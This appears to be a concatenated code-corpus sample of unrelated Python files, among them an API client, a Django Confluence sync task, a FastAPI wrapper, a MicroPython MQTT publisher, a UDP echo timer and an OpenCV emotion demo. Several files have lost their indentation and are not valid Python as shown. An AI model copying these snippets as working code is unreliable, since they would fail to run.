# Every call, with the exception of `/api/auth`, has to be authorized by a
# bearer token. Get a token by authenticating as admin and set it into the
# configuration. All subsequent calls will send this token as an
# `Authorization: Bearer <token>` header.
def authenticate(admin_user, admin_password):
with fc.ApiClient(configuration) as api_client:
auth_client = fc.AuthApi(api_client)
admin_auth = fc.AdminAuth(admin_user, admin_password)
configuration.access_token = auth_client.authenticate_owner(admin_auth=admin_auth)
admin_user = input("Username: ")
admin_password = input("Password: ")
authenticate(admin_user, admin_password)
with fc.ApiClient(configuration) as api_client:
# Create a new fling
fling_client = fc.FlingApi(api_client)
fling = fc.Fling(name="A Fling from Python", auth_code="secret",
direct_download=False, allow_upload=True,
expiration_time=datetime(2099, 12, 12))
    fling = fling_client.post_fling(fling=fling)  # pass the Fling built above (kwarg name assumed from the generated client)
print(f"Created a new fling: {fling}")
#
| 2.921875 | 3 |
pretraining/python/download_tensorboard_logs.py | dl4nlp-rg/PTT5 | 51 | 10831 | <filename>pretraining/python/download_tensorboard_logs.py
import tensorflow.compat.v1 as tf
import os
import tqdm
GCS_BUCKET = 'gs://ptt5-1'
TENSORBOARD_LOGS_LOCAL = '../logs_tensorboard'
os.makedirs(TENSORBOARD_LOGS_LOCAL, exist_ok=True)
# where to look for events files - experiment names
base_paths = [
# Main initial experiments - all weights are updated
'small_standard_vocab',
'base_standard_vocab',
'large_standard_vocab',
'small_custom_sentencepiece_vocab',
'base_custom_sentencepiece_vocab',
'large_custom_sentencepiece_vocab',
# Only embeddings are updated
'small_embeddings_only_standard_vocab',
'base_embeddings_only_standard_vocab',
'large_embeddings_only_standard_vocab',
'small_embeddings_only_custom_sentencepiece_vocab',
'base_embeddings_only_custom_sentencepiece_vocab',
'large_embeddings_only_custom_sentencepiece_vocab',
# Double batch size for large (128 = 64 * 2)
'large_batchsize_128_custom_sentencepiece_vocab',
'large_batchsize_128_standard_vocab',
]
# all paths have the scructure
for base_path in base_paths:
size = base_path.split('_')[0]
full_path = os.path.join(GCS_BUCKET, base_path, 'models', size)
download_dir = os.path.join(TENSORBOARD_LOGS_LOCAL, base_path)
if not os.path.exists(download_dir):
os.makedirs(download_dir, exist_ok=True)
print(f'Downloading files from {full_path} to {download_dir}')
for file in tqdm.tqdm(tf.gfile.Glob(os.path.join(full_path,
"events.*"))):
tf.gfile.Copy(file,
os.path.join(download_dir, os.path.basename(file)),
overwrite=False)
else:
        print(f'{base_path} logs already downloaded. Delete folder '
              f'{download_dir} and run script to download again')
| 2.265625 | 2 |
tests/TestPythonLibDir/RemotePkcs1Signer/__init__.py | q351941406/isign-1 | 83 | 10832 | import base64
import requests
class RemotePkcs1Signer(object):
""" Client-side Signer subclass, that calls the Signing Service over HTTP to sign things """
# standard headers for request
headers = {
'Content-Type': 'application/json',
'Accept': 'application/json'
}
def __init__(self, host, port, key, algorithm="SIGNATURE_RSA_PKCS1_SHA256", keyfile=None):
"""
:param host: host of the remote HTTP service
:param port: port of the remote HTTP service
:param key: see signing_service.py, in our case we use the hash of the related cert to identify the key
:param algorithm: which algorithm to use
:param keyfile: unused, this is a wart :(
"""
self.endpoint = "http://{}:{}/".format(host, port)
self.key = key
self.algorithm = algorithm
def sign(self, data):
plaintext_base64 = base64.b64encode(data)
plaintext_key = u'0'
payload = {
"key": self.key,
"plaintext": [{
"key": plaintext_key,
"value": plaintext_base64
}],
"algorithm": self.algorithm
}
response = requests.post(self.endpoint,
headers=self.__class__.headers,
json=payload).json()
signature = base64.b64decode(response[u'signature'][plaintext_key])
return signature
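# A minimal usage sketch (editor's note, not part of the original module); the
# host, port and key hash below are placeholder values, and a signing service
# matching the class docstring is assumed to be reachable over HTTP:
#
#     signer = RemotePkcs1Signer('localhost', 8080, key='aa:bb:cc:dd')
#     signature = signer.sign(b'data to be signed')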
| 3.140625 | 3 |
architecture_tool_django/nodes/tasks.py | goldginkgo/architecture_tool_django | 1 | 10833 | import logging
import re
from celery import shared_task
from django.conf import settings
from django.db.models import Q
from django.shortcuts import get_object_or_404
from django.template.loader import get_template
from django.urls import reverse
from django.utils import timezone
from architecture_tool_django.utils.confluence_wrapper import (
MyConfluence,
tiny_to_page_id,
)
from .models import Node
logger = logging.getLogger(__name__)
def get_node_attrs(instance):
attributes = {}
schema_properties = instance.nodetype.attribute_schema.schema["properties"]
for key, value in instance.attributeSet.items():
if key in schema_properties:
if "title" in schema_properties[key]:
attributes[schema_properties[key]["title"]] = value
else:
attributes[key] = value
attributes["Domain/Subsystem or Subdomain"] = ""
attributes["Service/Component Responsible"] = instance.attributeSet["name"]
attributes["Contact"] = ""
attributes["Service/Component Status"] = instance.attributeSet["status"]
return attributes
def get_outbound_edges(instance, base_url):
outbound_edges = {}
for edge in instance.outbound_edges.all():
edgetype = edge.edge_type.edgetype
if edgetype not in outbound_edges:
outbound_edges[edgetype] = []
url = base_url + reverse("nodes:node.detail", args=[edge.target.key])
name = edge.target.attributeSet.get("name")
item = f'(<a href="{url}">{edge.target.key}</a>) {name}'
outbound_edges[edgetype].append(item)
return outbound_edges
def get_inbound_edges(instance, base_url):
inbound_edges = {}
for edge in instance.inbound_edges.all():
edgetype = edge.edge_type.edgetype
if edgetype not in inbound_edges:
inbound_edges[edgetype] = []
url = base_url + reverse("nodes:node.detail", args=[edge.source.key])
name = edge.source.attributeSet.get("name")
item = f'(<a href="{url}">{edge.source.key}</a>) {name}'
inbound_edges[edgetype].append(item)
return inbound_edges
def update_confluence(title, context, doc_url):
new_spec = get_template("misc/confluence_page.html").render(context)
tiny = re.sub(r".*\/", "", doc_url)
page_id = tiny_to_page_id(tiny)
confluence = MyConfluence()
# page = confluence.get_page_by_id(page_id, expand="version,body.storage")
# version = int(re.sub(r".*\/", "", r.json()["version"]["_links"]["self"]))
confluence.update_page(
page_id,
title,
new_spec,
parent_id=None,
type="page",
representation="storage",
minor_edit=False,
)
def update_confluence_for_component(nodekey):
instance = get_object_or_404(Node, pk=nodekey)
doc_system = instance.attributeSet.get("primaryDocumentationSystem")
doc_url = instance.attributeSet.get("docupediaPage")
if doc_system != "ARC001" or doc_url == "":
return
base_url = settings.ARCHITECTURE_TOOL_URL
attributes = get_node_attrs(instance)
outbound_edges = get_outbound_edges(instance, base_url)
inbound_edges = get_inbound_edges(instance, base_url)
if "isDomainOf" in outbound_edges:
attributes["Domain/Subsystem or Subdomain"] = outbound_edges["isDomainOf"][0]
if "isResponsibleOf" in outbound_edges:
attributes["Service/Component Responsible"] = outbound_edges["isResponsibleOf"][
0
]
if "isContactOf" in outbound_edges:
attributes["Contact"] = ", ".join(outbound_edges["isContactOf"])
image_url = "https://www.xxx.com"
title = f'({instance.key}) {instance.attributeSet["name"]} ({instance.attributeSet["status"]})'
context = {
"base_url": base_url,
"node": instance,
"attributes": attributes,
"inbound_edges": inbound_edges,
"outbound_edges": outbound_edges,
"image_url": image_url,
}
update_confluence(title, context, doc_url)
@shared_task
def update_component_page_task(nodekey):
update_confluence_for_component(nodekey)
logger.info(f"Task: Page for {nodekey} updated!")
@shared_task
def update_components_page_task():
one_h_ago = timezone.now() - timezone.timedelta(hours=1)
nodes = Node.objects.filter(Q(nodetype="component") & Q(updated__gte=one_h_ago))
for node in nodes:
update_confluence_for_component(node.key)
logger.info("Task: All components updated!")
| 1.867188 | 2 |
crosswalk/views/alias_or_create.py | cofin/django-crosswalk | 4 | 10834 | <filename>crosswalk/views/alias_or_create.py
from crosswalk.authentication import AuthenticatedView
from crosswalk.models import Domain, Entity
from crosswalk.serializers import EntitySerializer
from crosswalk.utils import import_class
from django.core.exceptions import ObjectDoesNotExist
from rest_framework import status
from rest_framework.response import Response
class AliasOrCreate(AuthenticatedView):
def post(self, request, domain):
"""
Create an alias if an entity is found above a certain match threshold
or create a new entity.
"""
user = request.user
data = request.data.copy()
query_field = data.get("query_field")
query_value = data.get("query_value")
block_attrs = data.get("block_attrs", {})
create_attrs = data.get("create_attrs", {})
return_canonical = data.get("return_canonical", True)
threshold = data.get("threshold")
scorer_class = data.get("scorer", "fuzzywuzzy.default_process")
try:
scorer = import_class("crosswalk.scorers.{}".format(scorer_class))
except ImportError:
return Response(
"Invalid scorer.", status=status.HTTP_400_BAD_REQUEST
)
try:
domain = Domain.objects.get(slug=domain)
except ObjectDoesNotExist:
return Response(
"Domain not found.", status=status.HTTP_404_NOT_FOUND
)
# Find the best match for a query
entities = Entity.objects.filter(domain=domain)
entities = entities.filter(attributes__contains=block_attrs)
entity_values = [e.attributes[query_field] for e in entities]
match, score = scorer(query_value, entity_values)
entities = entities.filter(
**{"attributes__{}".format(query_field): match}
)
if entities.count() > 1:
return Response(
"More than one alias candiate for entity.",
status=status.HTTP_403_FORBIDDEN,
)
entity = entities.first()
attributes = {
**{query_field: query_value},
**block_attrs,
**create_attrs,
}
if entity.attributes == attributes:
return Response(
"Entity appears to already exist.",
status=status.HTTP_409_CONFLICT,
)
if score > threshold:
aliased = True
alias = Entity(
attributes=attributes,
alias_for=entity,
created_by=user,
domain=domain,
)
alias.save()
if return_canonical:
while entity.alias_for:
entity = entity.alias_for
else:
aliased = False
entity = Entity(
attributes=attributes, created_by=user, domain=domain
)
entity.save()
return Response(
{
"entity": EntitySerializer(entity).data,
"created": True,
"aliased": aliased,
"match_score": score,
},
status=status.HTTP_200_OK,
)
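# Example request body sketch (editor's note): the field names mirror the
# `data.get(...)` calls above, the `domain` comes from the URL route, and the
# concrete values are illustrative only.
#
#     {
#         "query_field": "name",
#         "query_value": "New Yrok City",
#         "block_attrs": {"state": "NY"},
#         "create_attrs": {"source": "manual"},
#         "threshold": 90,
#         "scorer": "fuzzywuzzy.default_process"
#     }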
| 2.484375 | 2 |
hoist/fastapi_wrapper.py | ZeroIntensity/Hoist | 0 | 10835 | from fastapi import FastAPI, Response, WebSocket, WebSocketDisconnect
from threading import Thread
from .server import Server
from .errors import HoistExistsError
from .error import Error
from .version import __version__
from .flask_wrapper import HTML
import uvicorn
from typing import List, Callable
from fastapi.responses import HTMLResponse, JSONResponse
class FastAPIWrapper:
"""Wrapper for FastAPI."""
@staticmethod
def make_server(*args, **kwargs) -> FastAPI:
"""Generate a FastAPI server."""
return FastAPI(*args, **kwargs)
def get_response(self, auth: str, tokens: List[str], callback: Callable, arg: str, response: Response) -> dict:
if not auth in tokens:
response.status_code = 401
return {'ERROR': 'unauthorized'}
resp, success = callback(arg)
if isinstance(resp, Error):
response.status_code = resp.code
return {'ERROR': resp.message}
if not success:
response.status_code = 500
return {'ERROR': resp}
else:
return {'RESPONSE': resp}
def add_hoist(self, app: FastAPI, handle_errors: bool = True, auth: list = [""], premade_pages: bool = True) -> FastAPI:
"""Function for setting up hoist on an app."""
if hasattr(app, 'HOIST_INTERNALSERVER'):
raise HoistExistsError('hoist is already set up on app')
app.HOIST_INTERNALSERVER = Server(app, handle_errors)
tokens: List[str] = auth.copy() # to stop collisions
app.HOIST_AUTH = tokens
app.HOIST_WRAPPER = self
@app.exception_handler(422)
def invalid_args(req, exc) -> JSONResponse:
return JSONResponse({"ERROR": "Invalid arguments."}, status_code = 400)
@app.post('/hoist/send')
def http_send(msg: str, auth: str, response: Response) -> dict:
return self.get_response(auth, tokens, app.HOIST_INTERNALSERVER._received, msg, response)
if premade_pages:
@app.get('/hoist')
def home_get() -> str:
return HTMLResponse(
HTML.replace('{{ version }}', __version__)
)
@app.post('/hoist')
def hoist_post() -> str:
return {'RESPONSE': f'Version {__version__}'}
return app
@staticmethod
def run_server(app: FastAPI, ip: str, port: int) -> None:
"""Function for running a FastAPI server."""
uvicorn.run(app, host = ip, port = port)
def thread_server(self, app: FastAPI, ip: str, port: int) -> FastAPI:
"""Function for running a flask app with a thread."""
server: Thread = Thread(target = self.run_server, args = (app, ip, port))
server.start()
return app
def add_socket(self, app: FastAPI, route: str) -> None:
"""Function for adding a socket to a FastAPI server."""
@app.websocket(route)
async def ws(websocket: WebSocket, response: Response):
sock = app.HOIST_SOCKETS[route]
for i in sock.connect:
i()
await websocket.accept()
while True:
try:
data = await websocket.receive_text()
resp = self.get_response("", app.HOIST_AUTH, sock._received, data, response)
await websocket.send_json(resp)
except WebSocketDisconnect:
for i in sock.disconnect:
i()
break
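# A minimal usage sketch (editor's note, not part of the original module); the
# token, host and port below are made-up values, and only methods defined above
# are used:
#
#     wrapper = FastAPIWrapper()
#     app = wrapper.make_server()
#     app = wrapper.add_hoist(app, auth=['my-secret-token'])
#     wrapper.run_server(app, '0.0.0.0', 5000)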
| 2.546875 | 3 |
network/mqtt_client/main_mqtt_publisher.py | flashypepo/myMicropython-Examples | 3 | 10836 | # This file is executed on every boot (including wake-boot from deepsleep)
# 2017-1210 PePo send timestamp and temperature (Celsius) to MQTT-server on BBB
# 2017-1105 PePo add _isLocal: sensor data to serial port (False) of stored in file (True)
# 2017-0819 PePo add sensor, led and print to serial port
# 2017-0811 PePo updated: no debug, disable webrepl,
# source: https://youtu.be/yGKZOwzGePY - Tony D! MP ESP8266 HTTP examples
print('main.py executing...')
# connect to a personal Wifi network ---------
import wifinetwork as wifi
# TODO: JSON config-file with ssid:ww entry/entries
#wifi.connectTo("PePoDevNet", wifi.readPasswordFrom('pepodevnet.txt'))
print('Wifi: connect to PePoDevNet...')
wifi.connectTo("PePoDevNet")
# set the time from nptime ---------
#print('TODO: get current time from the web...')
print('getting time from the web...')
import nptime
print('... UTC time:', nptime.settime())
#print('\tTODO -local time')
# --- SUMMERTIME or not (=WINTERTIME) ---------------
_isSummerTime = False
print('... Summertime:', _isSummerTime)
# temperature ---------
import class_ds18b20
#get sensor at GPIO14
ds = class_ds18b20.DS18B20(14)
# --- location ---------------
_LOCATION = 'studyroom'
#7-segment display
import tm1637
from machine import Pin
import math
# create tm
tm = tm1637.TM1637(clk=Pin(5), dio=Pin(4))
#print('tm: ', tm)
def display_tm1637(t):
#debug: print('display: temp=', t)
tm.temperature( math.floor(t) )
# helper function: returns temperature-record as string
def temp_record(timestamp, temp):
# timestamp[3] correction for Summertime or not
def _tc(t):
correction = 1
if _isSummerTime:
correction = 2
return t + correction
data = '{0},{1},{2},{3},{4},{5},{6},{7:0.2f}\n'.format(_LOCATION, timestamp[0],timestamp[1],timestamp[2],_tc(timestamp[3]),timestamp[4],timestamp[5],temp)
return data
#''' store data in file temperature.txt
# default: 1 measuremtn per 30 seconds
def saveT2File(dt=30.0):
import time
import utime
print('saveT2File({0}) entered...'.format(dt))
# helper function to add sensor data record to file
def write_record(timestamp, temp):
f = open('temperature.txt', 'a') #append mode
#data = '{0},{1},{2},{3},{4},{5},{6},{7:0.2f}\n'.format(_LOCATION, timestamp[0],timestamp[1],timestamp[2],_tc(timestamp[3]),timestamp[4],timestamp[5],temp)
f.write( temp_record(timestamp, temp) )
f.close()
while True:
#FUTURE: led.on()
timestamp = utime.localtime()
temp = ds.celsius
display_tm1637(temp) #display
write_record(timestamp, temp) #write in file
#FUTURE: led.off()
time.sleep(dt)
# send data to MQTT-server
def send2Server(dt=30.0):
import time
import utime
from umqtt.simple import MQTTClient
#print('send2server({0}) entered...'.format(dt))
#MQTT configuration -----------------
mqtt_server = '192.168.178.40' #ip-address of MQTT-server
TOPIC_TEST = b'topic/test' # topic: debug message
TOPIC_VALUE = b'topic/value' # topic: temperature value
TOPIC = b'topic/temperature' # topic: temp-record
    #helper: sends data to MQTT-server: connect-send payload-disconnect
def sendMQTT(payload, topic=TOPIC, server= mqtt_server):
#print('sendMQTT():', payload)
c = MQTTClient("umqtt_client", server)
c.connect() #success: returns 0
#debug: conn = c.connect()
#print('MQTT connection:', conn)
c.publish(topic, payload)
c.disconnect()
#broadcasting via topic:test
payload = b'MQTT-server: {0},\nTOPIC: {1},\nCollecting temperatures...'.format(mqtt_server, TOPIC) #debug
sendMQTT(payload, TOPIC_TEST)
print(payload)
while True:
timestamp = utime.localtime()
temp = ds.celsius
#print('temperature on display')
display_tm1637(temp)
#print('broadcast temp-record')
payload = temp_record(timestamp, temp)
sendMQTT(payload)
#print('broadcast temp-value')
payload = b'{0}'.format(temp)
sendMQTT(payload, TOPIC_VALUE)
time.sleep(dt)
#main run() - by-default 1 measurement per 30 seconds
def run(dt=30.0):
#store data local (True) or send to server (False)
_isLocal = False;
try:
if _isLocal:
# watch out: file can be very large overtime
saveT2File(dt)
else:
send2Server(dt)
except:
print('collecting temperature data intercepted')
pass
# go ahead and start getting, sending/storing the sensor data
if __name__ == "__main__":
run(60.0) # 1 measurement per minute
| 2.796875 | 3 |
2015/07.py | Valokoodari/advent-of-code | 2 | 10837 | <filename>2015/07.py
#!/usr/bin/python3
lines = open("inputs/07.in", "r").readlines()
for i,line in enumerate(lines):
lines[i] = line.split("\n")[0]
l = lines.copy();
wires = {}
def func_set(p, i):
if p[0].isdigit():
wires[p[2]] = int(p[0])
lines.pop(i)
elif p[0] in wires.keys():
wires[p[2]] = wires[p[0]]
lines.pop(i)
def func_and(p, i):
if p[0].isdigit() and p[2] in wires.keys():
wires[p[4]] = int(p[0]) & wires[p[2]]
lines.pop(i)
if p[0] in wires.keys() and p[2] in wires.keys():
wires[p[4]] = wires[p[0]] & wires[p[2]]
lines.pop(i)
def func_or(p, i):
if p[0] in wires.keys() and p[2] in wires.keys():
wires[p[4]] = wires[p[0]] | wires[p[2]]
lines.pop(i)
def func_rshift(p, i):
if p[0] in wires.keys():
wires[p[4]] = wires[p[0]] >> int(p[2])
lines.pop(i)
def func_lshift(p, i):
if p[0] in wires.keys():
wires[p[4]] = wires[p[0]] << int(p[2])
lines.pop(i)
def func_not(p, i):
if p[1] in wires.keys():
wires[p[3]] = 65535 - wires[p[1]]
lines.pop(i)
def run():
i = 0
while len(lines) > 0:
parts = lines[i].split(" ")
if "AND" in parts:
func_and(parts, i)
elif "NOT" in parts:
func_not(parts, i)
elif "RSHIFT" in parts:
func_rshift(parts, i)
elif "LSHIFT" in parts:
func_lshift(parts, i)
elif "OR" in parts:
func_or(parts, i)
else:
func_set(parts, i)
i += 1
if i >= len(lines):
i = 0
run()
print("Part 1: " + str(wires["a"]))
lines = l
wires = {"b": wires["a"]}
run()
print("Part 2: " + str(wires["a"]))
| 2.8125 | 3 |
soccer_embedded/Development/Ethernet/lwip-rtos-config/test_udp_echo.py | ghsecuritylab/soccer_ws | 56 | 10838 | <reponame>ghsecuritylab/soccer_ws
import socket
import time
import numpy
# This script sends a message to the board, at IP address and port given by
# server_address, using User Datagram Protocol (UDP). The board should be
# programmed to echo back UDP packets sent to it. The time taken for num_samples
# echoes is measured.
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('192.168.0.59', 7)
sock.bind(('', 7))
message = 'this is a message of length 80 chars. asdfghjklasdfghjklasdfghjklasdfghjkl ++++'.encode()
num_samples = 500
times = []
try:
# Send data
print('Sending "{}"'.format(message))
print('Measuring time taken for {} echoes'.format(num_samples))
total_time = 0
for i in range(num_samples):
t0 = time.perf_counter()
sent = sock.sendto(message, server_address)
# Receive response
data, server = sock.recvfrom(4096)
t1 = time.perf_counter()
dt = t1 - t0
total_time += dt
#print('received "{}"'.format(data))
times.append(dt)
f = open('times', 'a')
try:
f.write('\n')
for i in range(num_samples):
f.write('{},'.format(times[i]))
finally:
f.close()
times_array = numpy.array(times)
print('Took {} seconds for {} samples'.format(total_time, num_samples))
print('Average echo time: {} seconds'.format(numpy.average(times_array)))
print('Standard deviation: {} seconds'.format(numpy.std(times_array)))
print('Maximum: {} seconds, Minimum: {} seconds'.format(numpy.amax(times_array), numpy.amin(times_array)))
finally:
print('Closing socket')
sock.close()
| 2.96875 | 3 |
test.py | keke185321/emotions | 58 | 10839 | #!/usr/bin/env python
#
# This file is part of the Emotions project. The complete source code is
# available at https://github.com/luigivieira/emotions.
#
# Copyright (c) 2016-2017, <NAME> (http://www.luiz.vieira.nom.br)
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import argparse
import cv2
import numpy as np
from collections import OrderedDict
from datetime import datetime, timedelta
from faces import FaceDetector
from data import FaceData
from gabor import GaborBank
from emotions import EmotionsDetector
#---------------------------------------------
class VideoData:
"""
Helper class to present the detected face region, landmarks and emotions.
"""
#-----------------------------------------
def __init__(self):
"""
Class constructor.
"""
self._faceDet = FaceDetector()
'''
The instance of the face detector.
'''
self._bank = GaborBank()
'''
The instance of the bank of Gabor filters.
'''
self._emotionsDet = EmotionsDetector()
'''
The instance of the emotions detector.
'''
self._face = FaceData()
'''
Data of the last face detected.
'''
self._emotions = OrderedDict()
'''
Data of the last emotions detected.
'''
#-----------------------------------------
def detect(self, frame):
"""
Detects a face and the prototypic emotions on the given frame image.
Parameters
----------
frame: numpy.ndarray
Image where to perform the detections from.
Returns
-------
ret: bool
Indication of success or failure.
"""
ret, face = self._faceDet.detect(frame)
if ret:
self._face = face
# Crop just the face region
frame, face = face.crop(frame)
# Filter it with the Gabor bank
responses = self._bank.filter(frame)
# Detect the prototypic emotions based on the filter responses
self._emotions = self._emotionsDet.detect(face, responses)
return True
else:
self._face = None
return False
#-----------------------------------------
def draw(self, frame):
"""
Draws the detected data of the given frame image.
Parameters
----------
frame: numpy.ndarray
Image where to draw the information to.
"""
# Font settings
font = cv2.FONT_HERSHEY_SIMPLEX
scale = 0.5
thick = 1
glow = 3 * thick
# Color settings
black = (0, 0, 0)
white = (255, 255, 255)
yellow = (0, 255, 255)
red = (0, 0, 255)
empty = True
# Plot the face landmarks and face distance
x = 5
y = 0
w = int(frame.shape[1]* 0.2)
try:
face = self._face
empty = face.isEmpty()
face.draw(frame)
except:
pass
# Plot the emotion probabilities
try:
emotions = self._emotions
if empty:
labels = []
values = []
else:
labels = list(emotions.keys())
values = list(emotions.values())
bigger = labels[values.index(max(values))]
# Draw the header
text = 'emotions'
size, _ = cv2.getTextSize(text, font, scale, thick)
y += size[1] + 20
cv2.putText(frame, text, (x, y), font, scale, black, glow)
cv2.putText(frame, text, (x, y), font, scale, yellow, thick)
y += 5
cv2.line(frame, (x,y), (x+w,y), black, 1)
size, _ = cv2.getTextSize('happiness', font, scale, thick)
t = size[0] + 20
w = 150
h = size[1]
for l, v in zip(labels, values):
lab = '{}:'.format(l)
val = '{:.2f}'.format(v)
size, _ = cv2.getTextSize(l, font, scale, thick)
# Set a red color for the emotion with bigger probability
color = red if l == bigger else yellow
y += size[1] + 15
p1 = (x+t, y-size[1]-5)
p2 = (x+t+w, y-size[1]+h+5)
cv2.rectangle(frame, p1, p2, black, 1)
# Draw the filled rectangle proportional to the probability
p2 = (p1[0] + int((p2[0] - p1[0]) * v), p2[1])
cv2.rectangle(frame, p1, p2, color, -1)
cv2.rectangle(frame, p1, p2, black, 1)
# Draw the emotion label
cv2.putText(frame, lab, (x, y), font, scale, black, glow)
cv2.putText(frame, lab, (x, y), font, scale, color, thick)
# Draw the value of the emotion probability
cv2.putText(frame, val, (x+t+5, y), font, scale, black, glow)
cv2.putText(frame, val, (x+t+5, y), font, scale, white, thick)
except Exception as e:
print(e)
pass
#---------------------------------------------
def main(argv):
"""
Main entry of this script.
Parameters
------
argv: list of str
Arguments received from the command line.
"""
# Parse the command line
args = parseCommandLine(argv)
# Loads the video or starts the webcam
if args.source == 'cam':
video = cv2.VideoCapture(args.id)
if not video.isOpened():
print('Error opening webcam of id {}'.format(args.id))
sys.exit(-1)
fps = 0
frameCount = 0
sourceName = 'Webcam #{}'.format(args.id)
else:
video = cv2.VideoCapture(args.file)
if not video.isOpened():
print('Error opening video file {}'.format(args.file))
sys.exit(-1)
fps = int(video.get(cv2.CAP_PROP_FPS))
frameCount = int(video.get(cv2.CAP_PROP_FRAME_COUNT))
sourceName = args.file
# Force HD resolution (if the video was not recorded in this resolution or
# if the camera does not support it, the frames will be stretched to fit it)
# The intention is just to standardize the input (and make the help window
# work as intended)
video.set(cv2.CAP_PROP_FRAME_WIDTH, 1280);
video.set(cv2.CAP_PROP_FRAME_HEIGHT, 720);
# Create the helper class
data = VideoData()
# Text settings
font = cv2.FONT_HERSHEY_SIMPLEX
scale = 1
thick = 1
glow = 3 * thick
# Color settings
color = (255, 255, 255)
paused = False
frameNum = 0
# Process the video input
while True:
if not paused:
start = datetime.now()
ret, img = video.read()
if ret:
frame = img.copy()
else:
paused = True
drawInfo(frame, frameNum, frameCount, paused, fps, args.source)
data.detect(frame)
data.draw(frame)
cv2.imshow(sourceName, frame)
if paused:
key = cv2.waitKey(0)
else:
end = datetime.now()
delta = (end - start)
if fps != 0:
delay = int(max(1, ((1 / fps) - delta.total_seconds()) * 1000))
else:
delay = 1
key = cv2.waitKey(delay)
if key == ord('q') or key == ord('Q') or key == 27:
break
elif key == ord('p') or key == ord('P'):
paused = not paused
elif args.source == 'video' and (key == ord('r') or key == ord('R')):
frameNum = 0
video.set(cv2.CAP_PROP_POS_FRAMES, frameNum)
elif args.source == 'video' and paused and key == 2424832: # Left key
frameNum -= 1
if frameNum < 0:
frameNum = 0
video.set(cv2.CAP_PROP_POS_FRAMES, frameNum)
        elif args.source == 'video' and paused and key == 2555904: # Right key
            frameNum += 1
            if frameNum >= frameCount:
                frameNum = frameCount - 1
            video.set(cv2.CAP_PROP_POS_FRAMES, frameNum)
elif args.source == 'video' and key == 2162688: # Pageup key
frameNum -= (fps * 10)
if frameNum < 0:
frameNum = 0
video.set(cv2.CAP_PROP_POS_FRAMES, frameNum)
elif args.source == 'video' and key == 2228224: # Pagedown key
frameNum += (fps * 10)
if frameNum >= frameCount:
frameNum = frameCount - 1
video.set(cv2.CAP_PROP_POS_FRAMES, frameNum)
elif key == 7340032: # F1
showHelp(sourceName, frame.shape)
if not paused:
frameNum += 1
video.release()
cv2.destroyAllWindows()
#---------------------------------------------
def drawInfo(frame, frameNum, frameCount, paused, fps, source):
"""
Draws text info related to the given frame number into the frame image.
Parameters
----------
image: numpy.ndarray
Image data where to draw the text info.
frameNum: int
Number of the frame of which to drawn the text info.
frameCount: int
Number total of frames in the video.
paused: bool
Indication if the video is paused or not.
fps: int
Frame rate (in frames per second) of the video for time calculation.
source: str
Source of the input images (either "video" or "cam").
"""
# Font settings
font = cv2.FONT_HERSHEY_SIMPLEX
scale = 0.5
thick = 1
glow = 3 * thick
# Color settings
black = (0, 0, 0)
yellow = (0, 255, 255)
# Print the current frame number and timestamp
if source == 'video':
text = 'Frame: {:d}/{:d} {}'.format(frameNum, frameCount - 1,
'(paused)' if paused else '')
else:
text = 'Frame: {:d} {}'.format(frameNum, '(paused)' if paused else '')
size, _ = cv2.getTextSize(text, font, scale, thick)
x = 5
y = frame.shape[0] - 2 * size[1]
cv2.putText(frame, text, (x, y), font, scale, black, glow)
cv2.putText(frame, text, (x, y), font, scale, yellow, thick)
if source == 'video':
timestamp = datetime.min + timedelta(seconds=(frameNum / fps))
elapsedTime = datetime.strftime(timestamp, '%H:%M:%S')
timestamp = datetime.min + timedelta(seconds=(frameCount / fps))
totalTime = datetime.strftime(timestamp, '%H:%M:%S')
text = 'Time: {}/{}'.format(elapsedTime, totalTime)
size, _ = cv2.getTextSize(text, font, scale, thick)
y = frame.shape[0] - 5
cv2.putText(frame, text, (x, y), font, scale, black, glow)
cv2.putText(frame, text, (x, y), font, scale, yellow, thick)
# Print the help message
text = 'Press F1 for help'
size, _ = cv2.getTextSize(text, font, scale, thick)
x = frame.shape[1] - size[0] - 5
y = frame.shape[0] - size[1] + 5
cv2.putText(frame, text, (x, y), font, scale, black, glow)
cv2.putText(frame, text, (x, y), font, scale, yellow, thick)
#---------------------------------------------
def showHelp(windowTitle, shape):
"""
Displays an image with helping text.
Parameters
----------
windowTitle: str
Title of the window where to display the help
shape: tuple
Height and width of the window to create the help image.
"""
# Font settings
font = cv2.FONT_HERSHEY_SIMPLEX
scale = 1.0
thick = 1
# Color settings
black = (0, 0, 0)
red = (0, 0, 255)
# Create the background image
image = np.ones((shape[0], shape[1], 3)) * 255
# The help text is printed in one line per item in this list
helpText = [
'Controls:',
'-----------------------------------------------',
'[q] or [ESC]: quits from the application.',
'[p]: toggles paused/playing the video/webcam input.',
'[r]: restarts the video playback (video input only).',
'[left/right arrow]: displays the previous/next frame (video input only).',
'[page-up/down]: rewinds/fast forwards by 10 seconds (video input only).',
' ',
' ',
'Press any key to close this window...'
]
# Print the controls help text
xCenter = image.shape[1] // 2
yCenter = image.shape[0] // 2
margin = 20 # between-lines margin in pixels
textWidth = 0
textHeight = margin * (len(helpText) - 1)
lineHeight = 0
for line in helpText:
size, _ = cv2.getTextSize(line, font, scale, thick)
textHeight += size[1]
textWidth = size[0] if size[0] > textWidth else textWidth
lineHeight = size[1] if size[1] > lineHeight else lineHeight
x = xCenter - textWidth // 2
y = yCenter - textHeight // 2
for line in helpText:
cv2.putText(image, line, (x, y), font, scale, black, thick * 3)
cv2.putText(image, line, (x, y), font, scale, red, thick)
y += margin + lineHeight
# Show the image and wait for a key press
cv2.imshow(windowTitle, image)
cv2.waitKey(0)
#---------------------------------------------
